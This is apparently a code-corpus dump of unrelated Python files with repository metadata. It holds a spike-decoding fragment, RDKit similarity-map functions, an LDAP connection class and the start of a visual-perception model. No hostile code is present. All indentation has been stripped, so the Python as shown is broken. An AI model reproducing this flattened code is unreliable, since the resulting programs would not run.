k_start = 0
k_end = K
# The portion of the last block that overlaps with the current
# decoded block is stored here:
u_overlap = None
# The decoded blocks are accumulated in a list and concatenated
# when the end of the signal is reached:
u_block_list = []
t_max = np.max(map(np.sum, s_list))
k_max = ne.iround(t_max/dt)
# Don't bother stitching if the encoded signal spans an interval
# of time that is shorter than the block length:
if k_max < K_block:
return iaf.iaf_decode_delay(s_list, K*dt, dt, b_list, d_list,
k_list, a_list, w_list)
count = 0
while k_start < k_max:
# Select block of spike times to decode:
s_block_list = _get_spike_block(s_list, k_start*dt, k_end*dt)
print '%i: window: [%f, %f]' % (count, k_start*dt, k_end*dt)
count += 1
# Decode the block:
u_curr_list = iaf.iaf_decode_delay(s_block_list, K*dt, dt, b_list, d_list,
k_list, a_list, w_list)
# Convert decoded block into a 2D array to make processing easier:
u_curr = np.array(u_curr_list)
# The first block doesn't need to be stitched on its left side:
if first_block:
u_block_list.append(u_curr[:, 0:K_overlap])
else:
# Generate windowing functions needed to taper the overlap
# from the previous iteration and the overlap from the
# current iteration:
win_prev = _theta2(np.arange(K_overlap, dtype=np.float), 0,
K_overlap)
win_curr = _theta1(np.arange(K_overlap, dtype=np.float), 0,
K_overlap)
# Stitch and save the overlapping portion of the block:
u_block_list.append(u_overlap*win_prev+\
u_curr[:, 0:K_overlap]*win_curr)
if last_block:
# Save the rest of the current block and exit:
u_block_list.append(u_curr[:, K_overlap:])
break
else:
# Save the portion of the block that doesn't require stitching:
u_block_list.append(u_curr[:, K_overlap:-K_overlap])
# Retain the overlap on the right side of the decoded
# block for the next iteration:
u_overlap = u_curr[:, -K_overlap:]
# Advance t_start and t_end allowing for an overlap:
k_start += K_inc
k_end += K_inc
# When the end of the signal is reached, the decoding block
# must be shortened:
if k_end >= k_max:
k_end = k_max
K = k_end-k_start
last_block = True
else:
K = K_block
# Indicate that the first block has been processed:
if first_block:
first_block = False
# Concatenate all of the decoded blocks and return as a list of arrays:
return list(np.hstack(u_block_list))
|
bionet/ted.python
|
bionet/ted/rt.py
|
Python
|
bsd-3-clause
| 32,939
|
[
"NEURON"
] |
318491809d7a7bcdb9d5028fe7ebdf1e2fa81622b9fcb8e2cfde297a9e95acab
|
#
# Copyright (c) 2013, Novartis Institutes for BioMedical Research Inc.
# Copyright (c) 2021, Greg Landrum
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Created by Sereina Riniker, Aug 2013
import copy
import math
from numpy.lib.arraysetops import isin
try:
from matplotlib import cm
from matplotlib.colors import LinearSegmentedColormap
except ImportError:
cm = None
except RuntimeError:
cm = None
import numpy
from rdkit import Chem
from rdkit import DataStructs
from rdkit import Geometry
from rdkit.Chem import Draw
from rdkit.Chem.Draw import rdMolDraw2D
from rdkit.Chem import rdDepictor
from rdkit.Chem import rdMolDescriptors as rdMD
def GetAtomicWeightsForFingerprint(refMol, probeMol, fpFunction, metric=DataStructs.DiceSimilarity):
"""
Calculates the atomic weights for the probe molecule
based on a fingerprint function and a metric.
Parameters:
refMol -- the reference molecule
probeMol -- the probe molecule
fpFunction -- the fingerprint function
metric -- the similarity metric
Note:
If fpFunction needs additional parameters, use a lambda construct
"""
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
if hasattr(refMol, '_fpInfo'):
delattr(refMol, '_fpInfo')
refFP = fpFunction(refMol, -1)
probeFP = fpFunction(probeMol, -1)
baseSimilarity = metric(refFP, probeFP)
# loop over atoms
weights = []
for atomId in range(probeMol.GetNumAtoms()):
newFP = fpFunction(probeMol, atomId)
newSimilarity = metric(refFP, newFP)
weights.append(baseSimilarity - newSimilarity)
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
if hasattr(refMol, '_fpInfo'):
delattr(refMol, '_fpInfo')
return weights
def GetAtomicWeightsForModel(probeMol, fpFunction, predictionFunction):
"""
Calculates the atomic weights for the probe molecule based on
a fingerprint function and the prediction function of a ML model.
Parameters:
probeMol -- the probe molecule
fpFunction -- the fingerprint function
predictionFunction -- the prediction function of the ML model
"""
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
probeFP = fpFunction(probeMol, -1)
baseProba = predictionFunction(probeFP)
# loop over atoms
weights = []
for atomId in range(probeMol.GetNumAtoms()):
newFP = fpFunction(probeMol, atomId)
newProba = predictionFunction(newFP)
weights.append(baseProba - newProba)
if hasattr(probeMol, '_fpInfo'):
delattr(probeMol, '_fpInfo')
return weights
def GetStandardizedWeights(weights):
"""
Normalizes the weights,
such that the absolute maximum weight equals 1.0.
Parameters:
weights -- the list with the atomic weights
"""
tmp = [math.fabs(w) for w in weights]
currentMax = max(tmp)
if currentMax > 0:
return [w / currentMax for w in weights], currentMax
else:
return weights, currentMax
def GetSimilarityMapFromWeights(mol, weights, colorMap=None, scale=-1, size=(250, 250), sigma=None,
coordScale=1.5, step=0.01, colors='k', contourLines=10, alpha=0.5,
draw2d=None, **kwargs):
"""
Generates the similarity map for a molecule given the atomic weights.
Parameters:
mol -- the molecule of interest
colorMap -- the matplotlib color map scheme, default is custom PiWG color map
scale -- the scaling: scale < 0 -> the absolute maximum weight is used as maximum scale
scale = double -> this is the maximum scale
size -- the size of the figure
sigma -- the sigma for the Gaussians
coordScale -- scaling factor for the coordinates
step -- the step for calcAtomGaussian
colors -- color of the contour lines
contourLines -- if integer number N: N contour lines are drawn
if list(numbers): contour lines at these numbers are drawn
alpha -- the alpha blending value for the contour lines
kwargs -- additional arguments for drawing
"""
if mol.GetNumAtoms() < 2:
raise ValueError("too few atoms")
if draw2d is not None:
mol = rdMolDraw2D.PrepareMolForDrawing(mol, addChiralHs=False)
if not mol.GetNumConformers():
rdDepictor.Compute2DCoords(mol)
if sigma is None:
if mol.GetNumBonds() > 0:
bond = mol.GetBondWithIdx(0)
idx1 = bond.GetBeginAtomIdx()
idx2 = bond.GetEndAtomIdx()
sigma = 0.3 * (mol.GetConformer().GetAtomPosition(idx1) -
mol.GetConformer().GetAtomPosition(idx2)).Length()
else:
sigma = 0.3 * (mol.GetConformer().GetAtomPosition(0) -
mol.GetConformer().GetAtomPosition(1)).Length()
sigma = round(sigma, 2)
sigmas = [sigma] * mol.GetNumAtoms()
locs = []
for i in range(mol.GetNumAtoms()):
p = mol.GetConformer().GetAtomPosition(i)
locs.append(Geometry.Point2D(p.x, p.y))
draw2d.ClearDrawing()
ps = Draw.ContourParams()
ps.fillGrid = True
ps.gridResolution = 0.1
ps.extraGridPadding = 0.5
if colorMap is not None:
if cm is not None and isinstance(colorMap, type(cm.Blues)):
# it's a matplotlib colormap:
clrs = [tuple(x) for x in colorMap([0, 0.5, 1])]
else:
clrs = [colorMap[0], colorMap[1], colorMap[2]]
ps.setColourMap(clrs)
Draw.ContourAndDrawGaussians(draw2d, locs, weights, sigmas, nContours=contourLines, params=ps)
draw2d.drawOptions().clearBackground = False
draw2d.DrawMolecule(mol)
return draw2d
fig = Draw.MolToMPL(mol, coordScale=coordScale, size=size, **kwargs)
if sigma is None:
if mol.GetNumBonds() > 0:
bond = mol.GetBondWithIdx(0)
idx1 = bond.GetBeginAtomIdx()
idx2 = bond.GetEndAtomIdx()
sigma = 0.3 * math.sqrt(
sum([(mol._atomPs[idx1][i] - mol._atomPs[idx2][i])**2 for i in range(2)]))
else:
sigma = 0.3 * \
math.sqrt(sum([(mol._atomPs[0][i] - mol._atomPs[1][i])**2 for i in range(2)]))
sigma = round(sigma, 2)
x, y, z = Draw.calcAtomGaussians(mol, sigma, weights=weights, step=step)
# scaling
if scale <= 0.0:
maxScale = max(math.fabs(numpy.min(z)), math.fabs(numpy.max(z)))
else:
maxScale = scale
# coloring
if colorMap is None:
if cm is None:
raise RuntimeError("matplotlib failed to import")
PiYG_cmap = cm.get_cmap('PiYG', 2)
colorMap = LinearSegmentedColormap.from_list(
'PiWG', [PiYG_cmap(0), (1.0, 1.0, 1.0), PiYG_cmap(1)], N=255)
fig.axes[0].imshow(z, cmap=colorMap, interpolation='bilinear', origin='lower',
extent=(0, 1, 0, 1), vmin=-maxScale, vmax=maxScale)
# contour lines
# only draw them when at least one weight is not zero
if len([w for w in weights if w != 0.0]):
contourset = fig.axes[0].contour(x, y, z, contourLines, colors=colors, alpha=alpha, **kwargs)
for j, c in enumerate(contourset.collections):
if contourset.levels[j] == 0.0:
c.set_linewidth(0.0)
elif contourset.levels[j] < 0:
c.set_dashes([(0, (3.0, 3.0))])
fig.axes[0].set_axis_off()
return fig
def GetSimilarityMapForFingerprint(refMol, probeMol, fpFunction, metric=DataStructs.DiceSimilarity,
**kwargs):
"""
Generates the similarity map for a given reference and probe molecule,
fingerprint function and similarity metric.
Parameters:
refMol -- the reference molecule
probeMol -- the probe molecule
fpFunction -- the fingerprint function
metric -- the similarity metric.
kwargs -- additional arguments for drawing
"""
weights = GetAtomicWeightsForFingerprint(refMol, probeMol, fpFunction, metric)
weights, maxWeight = GetStandardizedWeights(weights)
fig = GetSimilarityMapFromWeights(probeMol, weights, **kwargs)
return fig, maxWeight
def GetSimilarityMapForModel(probeMol, fpFunction, predictionFunction, **kwargs):
"""
Generates the similarity map for a given ML model and probe molecule,
and fingerprint function.
Parameters:
probeMol -- the probe molecule
fpFunction -- the fingerprint function
predictionFunction -- the prediction function of the ML model
kwargs -- additional arguments for drawing
"""
weights = GetAtomicWeightsForModel(probeMol, fpFunction, predictionFunction)
weights, maxWeight = GetStandardizedWeights(weights)
fig = GetSimilarityMapFromWeights(probeMol, weights, **kwargs)
return fig, maxWeight
apDict = {}
apDict['normal'] = lambda m, bits, minl, maxl, bpe, ia, **kwargs: rdMD.GetAtomPairFingerprint(
m, minLength=minl, maxLength=maxl, ignoreAtoms=ia, **kwargs)
apDict['hashed'] = lambda m, bits, minl, maxl, bpe, ia, **kwargs: rdMD.GetHashedAtomPairFingerprint(
m, nBits=bits, minLength=minl, maxLength=maxl, ignoreAtoms=ia, **kwargs)
apDict[
'bv'] = lambda m, bits, minl, maxl, bpe, ia, **kwargs: rdMD.GetHashedAtomPairFingerprintAsBitVect(
m, nBits=bits, minLength=minl, maxLength=maxl, nBitsPerEntry=bpe, ignoreAtoms=ia, **kwargs)
# usage: lambda m,i: GetAPFingerprint(m, i, fpType, nBits, minLength, maxLength, nBitsPerEntry)
def GetAPFingerprint(mol, atomId=-1, fpType='normal', nBits=2048, minLength=1, maxLength=30,
nBitsPerEntry=4, **kwargs):
"""
Calculates the atom pairs fingerprint with the torsions of atomId removed.
Parameters:
mol -- the molecule of interest
atomId -- the atom to remove the pairs for (if -1, no pair is removed)
fpType -- the type of AP fingerprint ('normal', 'hashed', 'bv')
nBits -- the size of the bit vector (only for fpType='bv')
minLength -- the minimum path length for an atom pair
maxLength -- the maxmimum path length for an atom pair
nBitsPerEntry -- the number of bits available for each pair
"""
if fpType not in ['normal', 'hashed', 'bv']:
raise ValueError("Unknown Atom pairs fingerprint type")
if atomId < 0:
return apDict[fpType](mol, nBits, minLength, maxLength, nBitsPerEntry, 0, **kwargs)
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
return apDict[fpType](mol, nBits, minLength, maxLength, nBitsPerEntry, [atomId], **kwargs)
ttDict = {}
ttDict['normal'] = lambda m, bits, ts, bpe, ia, **kwargs: rdMD.GetTopologicalTorsionFingerprint(
m, targetSize=ts, ignoreAtoms=ia, **kwargs)
ttDict[
'hashed'] = lambda m, bits, ts, bpe, ia, **kwargs: rdMD.GetHashedTopologicalTorsionFingerprint(
m, nBits=bits, targetSize=ts, ignoreAtoms=ia, **kwargs)
ttDict[
'bv'] = lambda m, bits, ts, bpe, ia, **kwargs: rdMD.GetHashedTopologicalTorsionFingerprintAsBitVect(
m, nBits=bits, targetSize=ts, nBitsPerEntry=bpe, ignoreAtoms=ia, **kwargs)
# usage: lambda m,i: GetTTFingerprint(m, i, fpType, nBits, targetSize)
def GetTTFingerprint(mol, atomId=-1, fpType='normal', nBits=2048, targetSize=4, nBitsPerEntry=4,
**kwargs):
"""
Calculates the topological torsion fingerprint with the pairs of atomId removed.
Parameters:
mol -- the molecule of interest
atomId -- the atom to remove the torsions for (if -1, no torsion is removed)
fpType -- the type of TT fingerprint ('normal', 'hashed', 'bv')
nBits -- the size of the bit vector (only for fpType='bv')
minLength -- the minimum path length for an atom pair
maxLength -- the maxmimum path length for an atom pair
nBitsPerEntry -- the number of bits available for each torsion
any additional keyword arguments will be passed to the fingerprinting function.
"""
if fpType not in ['normal', 'hashed', 'bv']:
raise ValueError("Unknown Topological torsion fingerprint type")
if atomId < 0:
return ttDict[fpType](mol, nBits, targetSize, nBitsPerEntry, 0, **kwargs)
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
return ttDict[fpType](mol, nBits, targetSize, nBitsPerEntry, [atomId], **kwargs)
# usage: lambda m,i: GetMorganFingerprint(m, i, radius, fpType, nBits, useFeatures)
def GetMorganFingerprint(mol, atomId=-1, radius=2, fpType='bv', nBits=2048, useFeatures=False,
**kwargs):
"""
Calculates the Morgan fingerprint with the environments of atomId removed.
Parameters:
mol -- the molecule of interest
radius -- the maximum radius
fpType -- the type of Morgan fingerprint: 'count' or 'bv'
atomId -- the atom to remove the environments for (if -1, no environments is removed)
nBits -- the size of the bit vector (only for fpType = 'bv')
useFeatures -- if false: ConnectivityMorgan, if true: FeatureMorgan
any additional keyword arguments will be passed to the fingerprinting function.
"""
if fpType not in ['bv', 'count']:
raise ValueError("Unknown Morgan fingerprint type")
if not hasattr(mol, '_fpInfo'):
info = {}
# get the fingerprint
if fpType == 'bv':
molFp = rdMD.GetMorganFingerprintAsBitVect(mol, radius, nBits=nBits, useFeatures=useFeatures,
bitInfo=info, **kwargs)
else:
molFp = rdMD.GetMorganFingerprint(mol, radius, useFeatures=useFeatures, bitInfo=info,
**kwargs)
# construct the bit map
if fpType == 'bv':
bitmap = [DataStructs.ExplicitBitVect(nBits) for _ in range(mol.GetNumAtoms())]
else:
bitmap = [[] for _ in range(mol.GetNumAtoms())]
for bit, es in info.items():
for at1, rad in es:
if rad == 0: # for radius 0
if fpType == 'bv':
bitmap[at1][bit] = 1
else:
bitmap[at1].append(bit)
else: # for radii > 0
env = Chem.FindAtomEnvironmentOfRadiusN(mol, rad, at1)
amap = {}
Chem.PathToSubmol(mol, env, atomMap=amap)
for at2 in amap.keys():
if fpType == 'bv':
bitmap[at2][bit] = 1
else:
bitmap[at2].append(bit)
mol._fpInfo = (molFp, bitmap)
if atomId < 0:
return mol._fpInfo[0]
else: # remove the bits of atomId
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
if len(mol._fpInfo) != 2:
raise ValueError("_fpInfo not set")
if fpType == 'bv':
molFp = mol._fpInfo[0] ^ mol._fpInfo[1][atomId] # xor
else: # count
molFp = copy.deepcopy(mol._fpInfo[0])
# delete the bits with atomId
for bit in mol._fpInfo[1][atomId]:
molFp[bit] -= 1
return molFp
# usage: lambda m,i: GetRDKFingerprint(m, i, fpType, nBits, minPath, maxPath, nBitsPerHash)
def GetRDKFingerprint(mol, atomId=-1, fpType='bv', nBits=2048, minPath=1, maxPath=5, nBitsPerHash=2,
**kwargs):
"""
Calculates the RDKit fingerprint with the paths of atomId removed.
Parameters:
mol -- the molecule of interest
atomId -- the atom to remove the paths for (if -1, no path is removed)
fpType -- the type of RDKit fingerprint: 'bv'
nBits -- the size of the bit vector
minPath -- minimum path length
maxPath -- maximum path length
nBitsPerHash -- number of to set per path
"""
if fpType not in ['bv', '']:
raise ValueError("Unknown RDKit fingerprint type")
fpType = 'bv'
if not hasattr(mol, '_fpInfo'):
info = [] # list with bits for each atom
# get the fingerprint
molFp = Chem.RDKFingerprint(mol, fpSize=nBits, minPath=minPath, maxPath=maxPath,
nBitsPerHash=nBitsPerHash, atomBits=info, **kwargs)
mol._fpInfo = (molFp, info)
if atomId < 0:
return mol._fpInfo[0]
else: # remove the bits of atomId
if atomId >= mol.GetNumAtoms():
raise ValueError("atom index greater than number of atoms")
if len(mol._fpInfo) != 2:
raise ValueError("_fpInfo not set")
molFp = copy.deepcopy(mol._fpInfo[0])
molFp.UnSetBitsFromList(mol._fpInfo[1][atomId])
return molFp
|
greglandrum/rdkit
|
rdkit/Chem/Draw/SimilarityMaps.py
|
Python
|
bsd-3-clause
| 17,614
|
[
"RDKit"
] |
3edd3595ccdb0238034b36308c2b05c1f815f198856c919ee97df57d77af2dd6
|
# Copyright 2012-2014 Brian May
#
# This file is part of python-tldap.
#
# python-tldap is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-tldap is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with python-tldap If not, see <http://www.gnu.org/licenses/>.
""" This module provides the LDAP base functions
with a subset of the functions from the real ldap module. """
import ssl
import ldap3
import logging
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
logger = logging.getLogger(__name__)
def _debug(*argv):
argv = [str(arg) for arg in argv]
logger.debug(" ".join(argv))
class LDAPbase(object):
""" The vase LDAP connection class. """
def __init__(self, settings_dict):
self.settings_dict = settings_dict
self._obj = None
def reset(self):
pass
def close(self):
if self._obj is not None:
self._obj.unbind()
self._obj = None
#########################
# Connection Management #
#########################
def check_password(self, dn, password):
try:
conn = self._connect(user=dn, password=password)
conn.unbind()
return True
except ldap3.LDAPInvalidCredentialsResult:
return False
def _connect(self, user, password):
settings = self.settings_dict
_debug("connecting")
url = urlparse(settings['URI'])
if url.scheme == "ldaps":
use_ssl = True
elif url.scheme == "ldap":
use_ssl = False
else:
raise RuntimeError("Unknown scheme '%s'" % url.scheme)
if ":" in url.netloc:
host, port = url.netloc.split(":")
port = int(port)
else:
host = url.netloc
if use_ssl:
port = 636
else:
port = 389
start_tls = False
if 'START_TLS' in settings and settings['START_TLS']:
start_tls = True
tls = None
if use_ssl or start_tls:
tls = ldap3.Tls()
if 'TLS_CA' in settings and settings['TLS_CA']:
tls.ca_certs_file = settings['TLS_CA']
if 'REQUIRE_TLS' in settings and settings['REQUIRE_TLS']:
tls.validate = ssl.CERT_REQUIRED
s = ldap3.Server(host, port=port, use_ssl=use_ssl, tls=tls)
c = ldap3.Connection(
s, # client_strategy=ldap3.STRATEGY_SYNC_RESTARTABLE,
user=user, password=password, authentication=ldap3.AUTH_SIMPLE)
c.strategy.restartable_sleep_time = 0
c.strategy.restartable_tries = 1
c.raise_exceptions = True
c.open()
if start_tls:
c.start_tls()
try:
c.bind()
except:
c.unbind()
raise
return c
def _reconnect(self):
settings = self.settings_dict
try:
self._obj = self._connect(
user=settings['USER'], password=settings['PASSWORD'])
except Exception:
self._obj = None
raise
assert self._obj is not None
def _do_with_retry(self, fn):
if self._obj is None:
self._reconnect()
assert self._obj is not None
try:
return fn(self._obj)
except ldap3.core.exceptions.LDAPSessionTerminatedByServerError:
# if it fails, reconnect then retry
_debug("SERVER_DOWN, reconnecting")
self._reconnect()
return fn(self._obj)
###################
# read only stuff #
###################
def search(self, base, scope, filterstr='(objectClass=*)',
attrlist=None, limit=None):
"""
Search for entries in LDAP database.
"""
_debug("search", base, scope, filterstr, attrlist, limit)
# first results
if attrlist is None:
attrlist = ldap3.ALL_ATTRIBUTES
elif isinstance(attrlist, set):
attrlist = list(attrlist)
def first_results(obj):
_debug("---> searching ldap", limit)
obj.search(
base, filterstr, scope, attributes=attrlist, paged_size=limit)
return obj.response
# get the 1st result
result_list = self._do_with_retry(first_results)
# Loop over list of search results
for result_item in result_list:
# skip searchResRef for now
if result_item['type'] != "searchResEntry":
continue
dn = result_item['dn']
attributes = result_item['raw_attributes']
# did we already retrieve this from cache?
_debug("---> got ldap result", dn)
_debug("---> yielding", result_item)
yield (dn, attributes)
# we are finished - return results, eat cake
_debug("---> done")
return
|
brianmay/python-tldap-debian
|
tldap/backend/base.py
|
Python
|
gpl-3.0
| 5,414
|
[
"Brian"
] |
391c5b395e631dd7fb3cebc5400b56533b678d0ba4348d74f4488999773915fa
|
"""A biologically-inspired model of visual perception."""
from math import exp, hypot
import logging
import numpy as np
import cv2
import cv2.cv as cv
from collections import OrderedDict, deque
from itertools import izip
#import pyNN.neuron as sim
from lumos.context import Context
from lumos.util import Enum, getNormMap
from lumos.input import Projector, run
from lumos import rpc
from ..util.buffer import InputBuffer, OutputBuffer, BidirectionalBuffer, BufferAccessError
from ..neuron import Neuron, Population, Projection, neuron_inhibition_period, Uniform, MultivariateUniform, MultivariateNormal, NeuronMonitor, plotPopulations
from .photoreceptor import Rod, Cone
from .simplified.visual_cortex import SalienceNeuron, SelectionNeuron, FeatureNeuron
from ..motion.ocular import EmulatedOcularMotionSystem
# Global variables
default_feature_weight = 0.9 # default weight for a feature pathway, treated as update probability for its neurons
default_feature_weight_rest = 0.25 # default weight for features other than the ones desired
# Global GUI options
default_window_flags = cv2.WINDOW_AUTOSIZE | 0x00000010 # CV_GUI_NORMAL = 0x00000010
# Global initialization
np.set_printoptions(precision=4, linewidth=120) # for printing feature vectors: a few decimal places are fine; try not to break lines, especially in log files
class VisualFeaturePathway(object):
"""A collection of connected neuron populations that together compute a particular visual feature."""
def __init__(self, label, populations, projections, output=None, p=default_feature_weight, timeNow=0.0):
self.label = label
self.logger = logging.getLogger("{}-pathway".format(self.label))
self.populations = populations # order of populations matters here; this is the order in which they will be updated
self.projections = projections
#assert output in self.populations # usually, output is a population, but it can be something else
self.output = output
self.timeNow = timeNow
# * Top-level interface (TODO add neuron response/spike frequency as measure of strength)
self.active = True # used to selectively update specific pathways
self.p = p # update probability
self.selectedNeuron = None # the last selected SelectionNeuron, mainly for display and top-level output
self.selectedTime = 0.0 # corresponding timestamp
self.logger.debug("Initialized {}".format(self))
def update(self, timeNow):
self.timeNow = timeNow
# feature pathway specific updates may need to be carried out externally
def __str__(self):
return "{obj.label}-pathway: active: {obj.active}, p: {obj.p}, output: {output}".format(obj=self, output=(self.output.neurons[0].potential if self.output is not None and len(self.output.neurons) > 0 else None))
class Finst(object):
"""Finger of INSTantiation: A percept defined by a location in allocentric space, used for modulating attention."""
max_activation = 1.0
half_life = 5.0
min_good_activation = 0.1 # FINSTs with activation less than this could be discarded
default_radius = 100
def __init__(self, location, focusPoint, radius=None, timeCreated=0.0, activationCreated=max_activation):
self.location = location # egocentric fixation location at time of creation
self.focusPoint = focusPoint # allocentric focus point at time of creation
self.radius = radius if radius is not None else self.default_radius # an indicator of size
self.timeCreated = timeCreated # creation time
self.activationCreated = activationCreated # a measure of the strength of the FINST upon creation
self.inhibitionMap = getNormMap(self.radius * 2, sigma=self.radius / 3.0) # soft inhibition map based on Normal PDF
self.update(timeCreated)
def update(self, timeNow):
deltaTime = timeNow - self.timeCreated
self.activation = self.activationCreated / (2 ** (deltaTime / self.half_life))
def getAdjustedLocation(self, focusPoint):
return (self.location[0] + self.focusPoint[0] - focusPoint[0], self.location[1] + self.focusPoint[1] - focusPoint[1])
def __str__(self):
return "<loc: {self.location}, focus: {self.focusPoint}, act: {self.activation:.3f}>".format(self=self)
class VisualSystem(object):
"""Complete system for processing dynamic visual input."""
State = Enum(('NONE', 'FREE', 'SACCADE', 'FIXATE'))
intents = ['find', 'hold', 'release', 'reset'] # all supported intents
default_image_size = (256, 256) # (width, height) TODO read from context options
num_rods = 10000 # human: 90-120 million
num_cones = 1000 # human: 4.5-6 million
num_bipolar_cells = 2000
num_ganglion_cells = 1000
num_salience_neurons = 400
num_selection_neurons = 100
num_feature_neurons = 2 # no. of feature neurons per pathway, more implies finer feature resolution
num_finsts = 5 # no. of visual FINSTs
finst_decay_enabled = False # if enabled, FINST activations will be updated and those with low activation will be purged
finst_inhibition_enabled = True # if active FINST locations are inhibited
max_free_duration = 2.0 # artificial bound to prevent no results in case of very low salience inputs
min_saccade_duration = 0.05 # human: 0.02s (20ms)
#max_saccade_duration = 0.5 # human: 0.2s (200ms); not used as we end saccade period when ocular motion stops
min_fixation_duration = 0.5 # human: 0.1s (100ms), varies based by activity
max_fixation_duration = 3.0 # human: 0.5s (500ms), varies considerably by activity, affected by cognitive control
max_hold_duration = 5.0
min_good_salience = 0.66 # recommended values: 0.66 (filters out most unwanted regions)
min_saccade_salience = 0.175 # minimum salience required to make a saccade to (otherwise reset to center)
foveal_radius_ratio = 0.2 # fraction of distance from center to corners of the retina that is considered to be in foveal region
#default_fovea_size = (int(foveal_radius_ratio * default_image_size[0]), int(foveal_radius_ratio * default_image_size[1]))
default_fovea_size = (100, 100) # fixed size; specify None to compute using foveal radius and image size in __init__()
central_radius_ratio = 0.5 # radius to mark central region where visual acuity is modest and then falls off with eccentricity
def __init__(self, imageSize=default_image_size, foveaSize=default_fovea_size, timeNow=0.0, showMonitor=None, ocularMotionSystem=None):
# * Get context and logger
self.context = Context.getInstance()
self.logger = logging.getLogger(self.__class__.__name__)
# * Accept arguments, read parameters (TODO)
self.imageSize = imageSize # (width, height)
self.foveaSize = foveaSize
self.timeNow = timeNow
self.ocularMotionSystem = ocularMotionSystem # for eye movements, if available
# * System state
self.state = self.State.NONE
self.lastTransitionTime = self.timeNow
self.hold = False # hold gaze at a fixed location?
# * Structural/spatial members
self.bounds = np.float32([[0.0, 0.0, 2.0], [self.imageSize[0] - 1, self.imageSize[1] - 1, 4.0]])
self.center = (self.bounds[0] + self.bounds[1]) / 2
# * Images and related members (TODO do we need to initialize these at all? - new images are generated every update)
self.imageCenter = (self.imageSize[1] / 2, self.imageSize[0] / 2)
self.fovealRadius = hypot(self.imageCenter[0], self.imageCenter[1]) * self.foveal_radius_ratio
if self.foveaSize is None:
self.foveaSize = (int(self.fovealRadius * 2), int(self.fovealRadius * 2))
self.fovealSlice = np.index_exp[int(self.imageCenter[1] - self.foveaSize[1] / 2):int(self.imageCenter[1] + self.foveaSize[1] / 2), int(self.imageCenter[0] - self.foveaSize[0] / 2):int(self.imageCenter[0] + self.foveaSize[0] / 2)]
self.fixationSlice = self.fovealSlice
self.imageShapeC3 = (self.imageSize[1], self.imageSize[0], 3) # numpy shape for 3 channel images
self.imageShapeC1 = (self.imageSize[1], self.imageSize[0]) # numpy shape for single channel images
# NOTE Image shapes (h, w, 1) and (h, w) are not compatible unless we use keepdims=True for numpy operations
self.imageTypeInt = np.uint8 # numpy dtype for integer-valued images
self.imageTypeFloat = np.float32 # numpy dtype for real-valued images
self.images = OrderedDict()
# ** RGB and HSV images
self.images['BGR'] = np.zeros(self.imageShapeC3, dtype=self.imageTypeInt)
self.images['HSV'] = np.zeros(self.imageShapeC3, dtype=self.imageTypeInt)
self.images['H'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt)
self.images['S'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt)
self.images['V'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeInt)
# ** Rod and Cone response images (frequency/hue-dependent)
self.images['Rod'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Cone'] = OrderedDict() # NOTE dict keys must match names of Cone.cone_types (should this be flattened?)
self.images['Cone']['S'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Cone']['M'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Cone']['L'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
# ** Bipolar cell response images
# NOTE Rod bipolars are ON-center only; they connect to OFF-center Ganglion cells to initiate the dark pathway
# Here, an OFF map is computed from the ON map in order to simplify computation only
self.images['Bipolar'] = OrderedDict()
self.images['Bipolar']['ON'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['OFF'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['S'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['M'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
self.images['Bipolar']['L'] = np.zeros(self.imageShapeC1, dtype=self.imageTypeFloat)
# ** Ganglion cell response images, the source of cortical feature channels
# TODO Add more Ganglion cell types with different receptive field properties
# 'RG' +Red -Green
# 'GR' +Green -Red
# 'RB' +Red -Blue
